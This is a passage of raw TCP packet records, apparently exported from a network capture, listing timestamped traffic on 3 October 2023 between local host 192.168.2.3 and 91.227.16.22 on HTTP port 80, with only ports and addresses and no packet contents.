                                                                    Oct 3, 2023 09:55:09.954756021 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.954890966 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.954926968 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.955074072 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.955147028 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.955188036 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.955285072 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.955900908 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.955945015 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.955980062 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.956085920 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.956124067 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.956342936 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.956505060 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.956542015 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.956578970 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.956669092 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.956710100 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.956815958 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.956909895 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.956949949 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.956984997 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.957202911 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.957240105 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.957375050 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.957463026 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.957520962 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.957559109 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.957658052 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.957705975 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.957762957 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.957918882 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.957971096 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.958090067 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.958304882 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.958338022 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.958367109 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.958484888 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.958519936 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.958548069 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.958745956 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.958786964 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.958874941 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.959008932 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.959042072 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.959080935 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.959247112 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.959280014 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.959353924 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.959424019 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.959465027 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.959554911 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.959645987 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.959686995 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.959743023 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.959841967 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.959876060 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.959980965 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.960067034 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.960104942 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.960160017 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.960233927 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.960264921 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.960334063 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.960406065 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.960443020 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.960479021 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.960601091 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.960643053 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.960679054 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.960771084 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.960803986 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.960921049 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.961010933 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.961071968 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.961098909 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.961189985 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.961242914 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.961595058 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.961682081 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.961716890 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.961761951 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.961858034 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.961889982 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.961978912 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.962034941 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.962073088 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.962153912 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.962316990 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.962393045 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.962405920 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.962466955 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.962500095 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.962579966 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.962665081 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.962696075 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.962769032 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.962883949 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.962918043 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.963052988 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.963257074 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.963295937 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.963342905 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.963432074 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.963465929 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.963640928 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.963741064 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.963773012 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.964189053 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.964279890 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.964313030 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.964359999 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.964551926 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.964585066 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.964622974 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.964732885 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.964782000 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.964806080 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.964876890 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.964910030 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.964977026 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.965049982 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.965080976 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.965199947 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.965274096 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.965305090 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.965472937 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.965667009 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.965699911 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.965747118 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.965847015 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.965882063 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.965986967 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.966144085 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.966178894 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.966335058 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.966418028 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.966451883 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.966564894 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.966849089 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.966881037 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.967200994 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.967278957 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.967377901 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.967451096 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.967714071 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.967750072 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.967791080 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.967871904 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.967904091 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.967966080 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.968067884 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.968100071 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.968137980 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.968286991 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.968321085 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.968391895 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.968561888 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.968596935 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.968633890 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.968832970 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.968863964 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.968902111 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.969003916 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.969037056 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.969101906 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.969192028 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.969222069 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.969275951 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.969367027 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.969397068 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.969415903 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.969520092 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.969571114 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.969590902 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.969681978 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.969712973 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.969835043 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.969923019 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.969954014 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.969980001 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.970094919 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.970127106 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.970212936 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.970216990 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.970282078 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.970315933 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.970388889 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.970449924 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.970480919 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.970690012 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.970782995 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.970820904 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.970887899 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.971086979 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.971123934 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.971189022 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.971277952 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.971311092 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.971466064 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.971573114 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.971621037 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.971771002 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.971858978 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.972181082 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.972213984 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.972349882 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.972424984 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.972455978 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.972518921 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.972590923 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.972620010 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.973217010 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.973256111 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.973401070 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.973432064 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.973535061 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.974061012 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.974097013 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.974133968 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.974244118 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.974277020 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.974407911 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.974543095 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.975368977 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.975413084 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.975450993 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.975568056 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.975600004 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.975637913 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.975697041 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.975735903 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.975773096 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.975895882 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.976164103 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.976198912 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.976372957 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.976537943 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.976573944 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.976653099 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.976708889 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.976741076 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.976892948 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.976939917 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.976969004 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.977052927 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.977319956 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.977359056 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.977396965 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.977401018 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.977530956 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.977564096 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.977647066 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.977725983 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.977758884 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.977797985 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.977888107 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.977921009 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.977950096 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.978111029 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.978142977 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.978224039 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.978333950 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.978363991 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.978416920 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.978494883 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.978528976 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.978595018 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.978682041 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.978794098 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.978847980 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.979068041 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.979161978 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.979192972 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.979249001 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.979343891 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.979374886 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.979496002 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.979623079 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.979654074 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.979690075 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.979777098 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.979809999 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.979857922 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.980238914 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.980278015 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.980312109 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.980443954 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.980526924 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.980560064 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.981020927 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.981096983 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.981131077 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.981159925 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.981259108 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.981292963 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.981344938 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.981442928 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.981518984 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.981525898 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.981581926 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.981616974 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.981652021 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.981800079 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.981915951 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.981946945 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.981992960 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.982088089 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.982117891 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.982289076 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.982562065 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.982598066 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.982877016 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.982934952 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.983067989 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.983098030 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.983304024 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.983405113 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.983437061 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.983514071 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.983592033 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.983624935 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.983705044 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.983887911 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.983925104 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.983927965 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.984057903 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.984158993 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.984180927 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.984220982 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.984390020 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.984421015 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.984448910 CEST804981691.227.16.22192.168.2.3
